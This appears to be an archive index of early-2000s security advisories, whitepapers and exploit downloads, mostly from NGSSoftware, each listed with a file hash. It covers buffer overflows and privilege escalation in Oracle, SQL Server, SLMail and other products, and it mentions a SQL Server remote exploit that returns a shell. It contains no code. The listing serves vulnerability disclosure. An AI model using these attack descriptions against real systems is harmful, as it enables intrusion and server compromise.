NGSSoftware Insight Security Research Advisory #NISR03022004 - Adobe Acrobat Reader version 5.1 is susceptible to a buffer overflow when an xfdf file is parsed and an unsafe call to sprintf is made.
5c2fe87f3086d81cece64a96a65a42cdbe85f107673aa6bbea41d68b9a187dfe
NGSSoftware Insight Security Research Advisory #NISR05112003 - Multiple Oracle Application Server SQL injection vulnerabilities exist for all OS platforms with Oracle 9i Application Server Release 1 and 2 and RDBMS.
c14bf67a31522701aa71637b6fe672b5b213d2b13fe5d981c029e99e1d4ae4cf
Thorough paper discussing how to defeat the stack based buffer overflow prevention mechanism in Microsoft Windows 2003 Server.
b38cd24d571d9497d31fa51821bf46da5ded71c3cc615f565477fda2effa5f09
NGSSoftware Insight Security Research Advisory #NISR25072003 - In an attempt to fix previous vulnerabilities discovered by NGSSoftware, the Oracle RDBMS fix patched the hole but left a logging function vulnerable to a stack overflow.
237dd712fc93400a7d9eed9e111f3ab5238fd5fcb2322857fa12ec0d69be3187
NGSSoftware Insight Security Research Advisory #NISR07052003B - SLWebMail 3 is vulnerable to various buffer overflows in many of its ISAPI DLL applications including showlogin.dll, recman.dll, admin.dll, and globallogin.dll. It is also vulnerable to arbitrary file access via ShowGodLog.dll which does not even force authentication prior to use. Physical paths can also be determined by making invalid requests to certain DLLs.
54067ee210fce9b8f593df9b701aad1f9b7f8d14e93cc22925ce3b332df7bdb6
NGSSoftware Insight Security Research Advisory #NISR07052003A - SLMail 5.1.0.4420 suffers from multiple remotely exploitable buffer overflows in its SMTP engine, poppasswd and pop3 server.
f1596ac171952997d68b570e48c7d33e603793b70bb773d5a05f225bd2eec995
Software Insight Security Research Advisory #NISR29042003 - A classic stack based buffer overflow vulnerability exists in the Oracle database server that can be set up for exploitation by providing an overly long parameter for a connect string with the 'CREATE DATABASE LINK' query.
c3f8b0302120eee28deb89f9e37d6fc46825608d07e31b5127eebc4b72b60651
Whitepaper called Hackproofing Lotus Domino Web Server.
e72c2b8f13fb6814be70f4f3f1c13a46b474daf15badd237d92bab4ce9ce1bbd
MSSQL Server 2000 SP0 - SP2 remote exploit which uses UDP to overflow a buffer and send a shell to tcp port 53. Windows binary, C++ source code here.
d6907914ee2d6127262ab91de8878fe5f9b1afe9e8cda7d6345fd2c14feeb2fe
MSSQL Server 2000 SP0 - SP2 remote exploit which uses UDP to overflow a buffer and send a shell to tcp port 53.
7044113295ae8d7257c9af9f64073d4d2e4576635263c471c511b95c4f6eb551
The Oracle iSQL*Plus 91 R1 and R2 web based application has an authentication buffer overflow on all OS's in the User ID parameter which allows remote attackers to execute arbitrary code as the oracle user on Unix and SYSTEM on Windows. Patch available here.
1721781c18414d0033b5c54cab225544447998747b4d67107efcbc20286bb7b9
NGSSoftware Security Advisory - Microsoft SQL Server 2000 and 7 allow attackers to gain control of the database by elevating their privileges by using the xp_runwebtask stored procedure. Fix available here.
0993da5c8ab7c5ff24d06d11c71e7c6166e5eef4f669d081f8f47da07b21ae30
NGSSoftware Security Research Advisory NISR03092002 - The sp_MSSetServerProperties stored procedure in Microsoft SQL Server 2000 contains a low risk issue which allows remote users to decide whether or not SQL server starts up automatically. This does not allow an attacker to com promise the server or data but may be used in conjunction with another attack.
2d8b8761c587c92d162bdf1ffcb36e42ec190e63cc9a5e3406c3b2a332cc6519
NGSSoftware Security Research Advisory NISR03092002B - The Microsoft Windows .NET Server Release Candidate contains a buffer overflow in name resolution which allows an attacker without a userID or password to take control of the server with a single packet to UDP port 1434 on the machine running MSDE. Fix available here.
9db34630d664597a8cf29192735e45564c2d9e401bac5a6b0d4ed6fab67a82c6
NGSSoftware Security Research Advisory NISR25072002 - Microsoft's database server SQL Server 2000 exhibits two buffer overrun vulnerabilities that can be exploited by a remote attacker without ever having to authenticate to the server. What further exacerbates these issues is that the attack is channeled over UDP port 1434. Whether the SQL Server process runs in the security context of a domain user or the local SYSTEM account, successful exploitation of these security holes will mean a total compromise of the target server and its data.
7374876a71fb3fcb12a28e6f8cfb96087512b03f0bc58422af03eaa003fa9944
NGSSoftware Security Advisory NISR22002002A - Microsoft SQL Server 2000 SP 2 allows unprivileged users to insert and run arbitrary commands because a public stored procedure fails to validate user input before passing it to xp_cmdshell. Fix available here.
ec956303773437c9c86299281915cc489c31d1aba9eef2f1ee381b8c865bfd6d
NGSSoftware Security Advisory NISR19002002A - Microsoft SQL Server 2000 and 7 come with a "helper" service which allows a low privileged user to create and overwrite arbitrary files on the SQL server. Includes proof of concept SQL code.
d00fd77d758ad8f157ea1a193c0b5f00842cddd2ba606d82b82ca8b386411279
NGSSoftware Security Advisory - Microsoft SQL Server 2000 and 7's helper service allows an attacker to submit jobs to the SQL Agent to be executed with elevated privileges. Proof of concept sql code included. This vulnerability is discussed in ms02-042.
9bf0a97cb7b8ed59e9098bf029a62f468d0bfbd94895eae5891363aff1545a15
Oracle provide a tool called the Listener Control utility (lsnrctl) to allow an Oracle DBA to remotely control the Listener. The Listener is responsible for dealing with client requests for database services. This control utility contains an indirect remotely exploitable format string vulnerability. By default the Oracle Listener is not protected against unauthenticated access and control. The configuration files of Listeners in such a state can be modified without the user needing to supply a password. By modifying certain entries in the listener.ora file, by inserting a format string exploit, an attacker can gain control of a Listener control utility.
670c33c99fb1077f6adc54c6ef7f9e82ca3f1c4fcc69fdf1ecde9e16b02514fa
Information on cracking the Microsoft SQL pwdencrypt() hash function which is used to generate SQL hashes.
5c2b4319be1979dcbd27e7fd3420df3b66d393c7fcb09d4c8682d6c6694cd701
The Sun iPlanet Web Server iWS 4.1 and 6.0 contains a remotely exploitable buffer overflow if the search feature is enabled.
569fc6dbae95b454b1cb7139d2f9325513c3521f10923c0642d0afb59f288e67
The Oracle 9iAS Reports Server contains a remotely exploitable buffer overrun vulnerability in one of its CGI's. By supplying an overly long database name parameter to the rwcgi60 with the setauth method, an attacker can run code with the privileges of the web server, or SYSTEM on windows.
36a7f0df817729ef91da8556ccad29083ab8e3a5fd0b1f644b31ce787342fffa
The Oracle TNS Listener version 9i contains a buffer overflow vulnerability which can be exploited over tcp port 1521 to gain remote SYSTEM / root access. By supplying an overly long SERVICE_NAME parameter an attacker can execute code before any logging is done.
09848a3033d275f59cf4d5ef91914e928a9a4fc43a64f46b30fa0e2a771e35d4
Macromedia JRun v3.1 for IIS 4/5 on WinNT 4/Win2K contains buffer overflow which allows remote code execution as the local system account.
2bd79d12f83316af1256e8abf3f82e65b0e812edc901f4c331319be81254b1ee
This document describes buffer overrun vulnerabilities on Sun Microsystems SPARC machines. We will begin by examining the SPARC architecture, looking at the registers and the stack. We will then go on to see exact how buffer overrun vulnerabilities occur and how control over the processes execution is gained under SPARC and then detail how, from here, the vulnerability can be exploited to gain control over the computer by looking at exploit code that spawns a shell under Solaris.
ea2827088b20a431d2ee4be68183cd2ee8cf525ff70d198af4b747cffecabe5c